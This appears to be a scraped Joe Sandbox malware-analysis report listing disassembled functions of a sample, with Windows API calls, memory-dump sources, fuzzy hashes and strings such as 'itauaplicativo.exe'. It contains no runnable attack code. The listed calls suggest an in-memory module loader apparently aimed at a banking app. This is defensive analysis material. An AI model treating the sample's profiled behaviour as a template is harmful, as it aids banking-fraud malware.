Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Module$FileHandleName
String ID: Funo Limpar chamada com sucesso!$MyCallUpdate$\FrontendCybersecurity.json
API String ID: 4146042529-2422905399
Opcode ID: 690903236719d1d92806a7357e3e0544e7b06593896d2413de2dd4885ee082e2
Instruction ID: 46d5307ff33dd4e17b95d6f2bce110e6fbccc3c5f5c48ff89a9730e3fd140865
Opcode Fuzzy Hash: 690903236719d1d92806a7357e3e0544e7b06593896d2413de2dd4885ee082e2
Instruction Fuzzy Hash: 9581D662F1CF8141F600DB36D4502B967A2FB96BA4F1456B6EE5C17AA6DF7CE480C700

Function 00007FFE1A530948 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE1A53052C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A53056D
Part of subcall function 00007FFE1A53052C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A5305EB
Part of subcall function 00007FFE1A53052C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A53063C

CreateFileW.KERNELBASE ref: 00007FFE1A530A4E
CreateFileW.KERNEL32 ref: 00007FFE1A530A9E
GetLastError.KERNEL32 ref: 00007FFE1A530ACE
GetFileType.KERNELBASE ref: 00007FFE1A530AE3
GetLastError.KERNEL32 ref: 00007FFE1A530AED
CloseHandle.KERNEL32 ref: 00007FFE1A530B20
CloseHandle.KERNEL32 ref: 00007FFE1A530C83
CreateFileW.KERNEL32 ref: 00007FFE1A530CB8
GetLastError.KERNEL32 ref: 00007FFE1A530CC7

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 392675c790b07b1ed8a0e4036695803506c8d1ed71a605985da2029bf13caede
Instruction ID: 5cc893e75ddfff2be9772f87ed9c7d4607f893bbb8c1bff2b24bea7ca479e2ae
Opcode Fuzzy Hash: 392675c790b07b1ed8a0e4036695803506c8d1ed71a605985da2029bf13caede
Instruction Fuzzy Hash: 90C1AF36B28F4585EB10CFA6D4906BC3761EB8AFB8B0142A6DA1E977A5DF38D455C300

Function 00000001800143F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE ref: 0000000180014428
CoInitializeSecurity.COMBASE ref: 0000000180014475

Strings

itauaplicativo.exe, xrefs: 0000000180014A17

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Initialize$Security
String ID: itauaplicativo.exe
API String ID: 119290355-894439669
Opcode ID: e9b9288197885b884f5346f648a99bf6e075c592a284b3d768ad5b963401f7cf
Instruction ID: d73d2298f52c514effeafdd3db4ff88a9c40a445871b81f6de80332f3ba8360e
Opcode Fuzzy Hash: e9b9288197885b884f5346f648a99bf6e075c592a284b3d768ad5b963401f7cf
Instruction Fuzzy Hash: 1A419B33714B48DAF752DB60E8403CE33A5FB88788F508519EA895BAA9DF38C319C740

Function 00007FFE1A512DF0 Relevance: 3.2, APIs: 2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A5130F0
GetModuleHandleExW.KERNEL32 ref: 00007FFE1A51312D

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: HandleModule_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2109487390-0
Opcode ID: 52be0ff8e1d47546cc31a98090ce59b89f1e63b0c7a4a48e36bca0cc7a5d8f3d
Instruction ID: 4445dc606ffa3f86f02e47983c31b22fb49395c3de4face1df97c4b6ffbfe19a
Opcode Fuzzy Hash: 52be0ff8e1d47546cc31a98090ce59b89f1e63b0c7a4a48e36bca0cc7a5d8f3d
Instruction Fuzzy Hash: 57A18072B19F8585EB00CB2AE4412BD77A1FBD5BA8F005267EA8D13B65EF38D051C740

Function 0000000180017CE0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 61
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VerSetConditionMask.KERNEL32 ref: 0000000180017D44
VerSetConditionMask.KERNEL32 ref: 0000000180017D53
VerSetConditionMask.KERNEL32 ref: 0000000180017D62
VerifyVersionInfoW.KERNEL32 ref: 0000000180017D84
GetModuleHandleW.KERNEL32 ref: 0000000180017D95
GetProcAddress.KERNEL32 ref: 0000000180017DAA
CreateThread.KERNELBASE ref: 0000000180017DCE

Strings

user32.dll, xrefs: 0000000180017D8E
SetProcessDPIAware, xrefs: 0000000180017DA0

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ConditionMask$AddressCreateHandleInfoModuleProcThreadVerifyVersion
String ID: SetProcessDPIAware$user32.dll
API String ID: 3240345072-1137607222
Opcode ID: 194fb7fd6a538d454d73a814b282433accd47e49dd42cdb5a5531bb8c4bfbbc0
Instruction ID: 83d84116110a60bfccc59eb074da09c222fac2c3552fe5782e6dca1b26c0c9a6
Opcode Fuzzy Hash: 194fb7fd6a538d454d73a814b282433accd47e49dd42cdb5a5531bb8c4bfbbc0
Instruction Fuzzy Hash: 6C212D36214B8886EBA6CF60F8543DA73B1FB8DB84F458119EA5D4B755EF3DC2088B10

Function 00007FFE1A52782C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A527C59

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7ef4f73a60354d998a666dc0fe305ac9e8c04852377c14fee1641598e159c98e
Instruction ID: 73607f69cc727306cfd949c751b704a6449598954428ccabdef9c6d6da3300b0
Opcode Fuzzy Hash: 7ef4f73a60354d998a666dc0fe305ac9e8c04852377c14fee1641598e159c98e
Instruction Fuzzy Hash: 5BC19122B0CF86D6EA61DB9694402BE6A52EB82FA0F5541F7DA4E037A1DF7CE5458300

Function 00007FF6B40A199C Relevance: 9.1, APIs: 6, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF6B40A19AE
_FF_MSGBANNER.LIBCMT ref: 00007FF6B40A1A4C
_FF_MSGBANNER.LIBCMT ref: 00007FF6B40A1A77
_RTC_Initialize.LIBCMT ref: 00007FF6B40A1A90
GetCommandLineW.KERNEL32 ref: 00007FF6B40A1AA9
_cinit.LIBCMT ref: 00007FF6B40A1AEC

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: CommandInfoInitializeLineStartup_cinit
String ID:
API String ID: 3693240955-0
Opcode ID: b4ca965fd34699ee2de4fc87f579fb0bf657b02dd48662c48af51c678c2e3698
Instruction ID: 6c750597c137dfe73e4572f2bef48c4fef09ca20abcccbd5d59cdfa90c873e0b
Opcode Fuzzy Hash: b4ca965fd34699ee2de4fc87f579fb0bf657b02dd48662c48af51c678c2e3698
Instruction Fuzzy Hash: 57415B21E0C78B86FB64AFACA4D53BA6291AF91384F404138D75DCA6D7EF7CA4448712

Function 00007FFE1A511600 Relevance: 7.6, APIs: 5, Instructions: 110
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsBadReadPtr.KERNEL32 ref: 00007FFE1A51163E
LoadLibraryA.KERNELBASE ref: 00007FFE1A511684
IsBadReadPtr.KERNEL32 ref: 00007FFE1A511733
SetLastError.KERNEL32 ref: 00007FFE1A511755
SetLastError.KERNEL32 ref: 00007FFE1A511773

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastRead$LibraryLoad
String ID:
API String ID: 163775416-0
Opcode ID: a7bc3099fe113e09b80ddd6638384a5af8e447e0e33e91155b53306c2e2b36fd
Instruction ID: f2f944238d4fce805d2c5f24811c73f03b8144b5439bc183dbb0be0302baa128
Opcode Fuzzy Hash: a7bc3099fe113e09b80ddd6638384a5af8e447e0e33e91155b53306c2e2b36fd
Instruction Fuzzy Hash: C541476AB08B4282EA108B16E54433973A1FB49FA4F0845BADF5E47BA4DF3CE464C700

Function 0000000180044DDC Relevance: 7.6, APIs: 5, Instructions: 60
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000000180044E00
CreateThread.KERNELBASE ref: 0000000180044E41
GetLastError.KERNEL32 ref: 0000000180044E4F
CloseHandle.KERNEL32 ref: 0000000180044E6C
FreeLibrary.KERNEL32 ref: 0000000180044E7B

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 407fd9e8e38f8f32558c6fa2341ff7b9a02398b45d756279f247c3cb076210ac
Instruction ID: c29ea1c11c21d4d66a6a9e735680bef3a840265e570e5360c85651ad49d0c129
Opcode Fuzzy Hash: 407fd9e8e38f8f32558c6fa2341ff7b9a02398b45d756279f247c3cb076210ac
Instruction Fuzzy Hash: 81218436605F4886EF96DFA7A4903D963A4BB8DBC8F198420FE590B755DF38C6088744

Function 00007FFE1A516DD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A516F3E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A516F44

Strings

vector too long, xrefs: 00007FFE1A516DB4

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: vector too long
API String ID: 73155330-2873823879
Opcode ID: d3622dc8edd2019b0125db670a3e1098039b5e09ffb80e99d3bac1ebdb3d132e
Instruction ID: 3c1cb3860e35c9703e15b90d4852e41942628764992802da875c79e5cd97f620
Opcode Fuzzy Hash: d3622dc8edd2019b0125db670a3e1098039b5e09ffb80e99d3bac1ebdb3d132e
Instruction Fuzzy Hash: 9B41E522B0DE9591EA14DB67D05427D6351AB05FE4F544AB6EF6C03FA5CE3CE451C300

Function 00007FFE1A51EEAC Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51EED3

Part of subcall function 00007FFE1A51EE68: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51EE7F

_invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A51EF87

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e885b17665a2dd31cb4299c6a81f387d4afe01340b0e2ba02016db706bf6208a
Instruction ID: ab74380927d9e29dbd792fe0b44cbf91568825890ea380e9c8393dde408b543d
Opcode Fuzzy Hash: e885b17665a2dd31cb4299c6a81f387d4afe01340b0e2ba02016db706bf6208a
Instruction Fuzzy Hash: B0319162B1CE4681EA54DB56E4405BD6362AB96FA4F9401F3ED0E473F2EE3CE501D340

Function 00007FFE1A511370 Relevance: 3.1, APIs: 2, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 00007FFE1A5113D7
VirtualProtect.KERNELBASE ref: 00007FFE1A51143B

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Virtual$FreeProtect
String ID:
API String ID: 2581862158-0
Opcode ID: c9340ad706bc7b2b5b3fcb773faec9479fe2c1da27ef13a698d6cd1695f03c2d
Instruction ID: 6e61748226751eda424e850fa6178e0127bcc4ad8fca228b8b32d672b8b80723
Opcode Fuzzy Hash: c9340ad706bc7b2b5b3fcb773faec9479fe2c1da27ef13a698d6cd1695f03c2d
Instruction Fuzzy Hash: D921B2B6B18E0582EE14CB07E05057977A1FB9AFA4B8550B6CE0D4BB29DF3CD491C700

Function 00007FF6B40A4674 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,00007FF6B40A1ABA), ref: 00007FF6B40A4688
FreeEnvironmentStringsW.KERNEL32(?,?,?,00007FF6B40A1ABA), ref: 00007FF6B40A46DF

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 7f7842120b0d0bbdeb0390105368c986072d5d668b2b396a1360fc0dc6250a13
Instruction ID: 98b04d24ff1463d3d7382c6a9fd19db4edc6e9022f6947fad46169e8626e85a8
Opcode Fuzzy Hash: 7f7842120b0d0bbdeb0390105368c986072d5d668b2b396a1360fc0dc6250a13
Instruction Fuzzy Hash: DD01A716F1875685EE60AF6AA58507967B0EF44FC4F4C4431DB4D87B45EE2CE4918701

Function 00007FFE1A516FD4 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A517004

Part of subcall function 00007FFE1A517628: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFE1A517631

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE1A51700A

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 17db8b42a86ebca383d9797ab49643cfb5ae5f0a15a1fe32138fe453f1fc8a40
Instruction ID: b9ad04eedf67113756f049680bd5c8f627ac0d55faef9a73d6576782380424ba
Opcode Fuzzy Hash: 17db8b42a86ebca383d9797ab49643cfb5ae5f0a15a1fe32138fe453f1fc8a40
Instruction Fuzzy Hash: FFE0EC41F4E94741F968256B181517901420F0BF70F1C1BF2E93D44AF7AD1CA8A18560

Function 00007FF6B40A4A68 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(?,?,?,?,00007FF6B40A1A3F), ref: 00007FF6B40A4A7A
HeapSetInformation.KERNEL32 ref: 00007FF6B40A4AA4

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: Heap$CreateInformation
String ID:
API String ID: 1774340351-0
Opcode ID: b67d35cb5197673c535c3f36019fe6e64f5d42afe0c755123a7b85a358f51c6e
Instruction ID: 3ded98d80785b7486bb39d0f327be1835c0cc61ea8f8521ff84afa541712752d
Opcode Fuzzy Hash: b67d35cb5197673c535c3f36019fe6e64f5d42afe0c755123a7b85a358f51c6e
Instruction Fuzzy Hash: B0E08675F2679183F7989F29E88576A6660FF88380F809139EB4D82B94EF3CD045CB00

Function 00007FFE1A511230 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FFE1A5112FC
SetLastError.KERNEL32 ref: 00007FFE1A511342

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: AllocErrorLastVirtual
String ID:
API String ID: 497505419-0
Opcode ID: 5deb9a3d322861eb48c7a547b46858b24a29d2883b57ff176137fdb2125a48b3
Instruction ID: 9c001b50343e48e106ac6654daefa91a341a3d51fd47cf551df32525e0dd61c6
Opcode Fuzzy Hash: 5deb9a3d322861eb48c7a547b46858b24a29d2883b57ff176137fdb2125a48b3
Instruction Fuzzy Hash: CB317C32B08A8186EB24CB16E544A7DB7A1FB89F98F0484AADB4D47B68DF3CD441C700

Function 00007FFE1A528864 Relevance: 2.6, APIs: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,00007FFE1A528815), ref: 00007FFE1A5288D2
GetLastError.KERNEL32(?,?,?,00007FFE1A528815), ref: 00007FFE1A5288DC

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: 2b7649aae9a277431fced47d6a9cb7cc8007430638472e51d4d6db45ff19bad4
Instruction ID: d617c1eee4a60528da109e0efabe95e4716b18e23c140f74b463cb509d324c58
Opcode Fuzzy Hash: 2b7649aae9a277431fced47d6a9cb7cc8007430638472e51d4d6db45ff19bad4
Instruction Fuzzy Hash: C721A111B0CE4281EE9597E3A48427D1683AF86FB4F0846F7FA1E873E6DE7CE4558201

Function 00007FF6B40A6724 Relevance: 2.5, APIs: 2, Instructions: 30sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF6B40A6743

Part of subcall function 00007FF6B40A5D28: _FF_MSGBANNER.LIBCMT ref: 00007FF6B40A5D58
Part of subcall function 00007FF6B40A5D28: HeapAlloc.KERNEL32(?,?,00000000,00007FF6B40A6748,?,?,00000000,00007FF6B40A5B2D,?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21), ref: 00007FF6B40A5D7D
Part of subcall function 00007FF6B40A5D28: _errno.LIBCMT ref: 00007FF6B40A5DA1
Part of subcall function 00007FF6B40A5D28: _errno.LIBCMT ref: 00007FF6B40A5DAC

Sleep.KERNEL32(?,?,00000000,00007FF6B40A5B2D,?,?,00000000,00007FF6B40A5BD7,?,?,00000000,00007FF6B40A2F21,?,?,00000000,00007FF6B40A2FD8), ref: 00007FF6B40A675A

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: _errno$AllocHeapSleepmalloc
String ID:
API String ID: 496785850-0
Opcode ID: ca4c6c70985f552db837bde97e2a5673dd47c1bab5181763a49ffb21a3e9890b
Instruction ID: 7d61f77d25086c80fc05543ee0f8f3bfea068a50df947ce514f5471fad6311bb
Opcode Fuzzy Hash: ca4c6c70985f552db837bde97e2a5673dd47c1bab5181763a49ffb21a3e9890b
Instruction Fuzzy Hash: 6EF0F632A1878682EA109F1EE48017E72B1EF84B90F440234EB9D87794CF3CEC918B00

Function 00007FFE1A5142A0 Relevance: 1.7, APIs: 1, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFE1A514567

Memory Dump Source

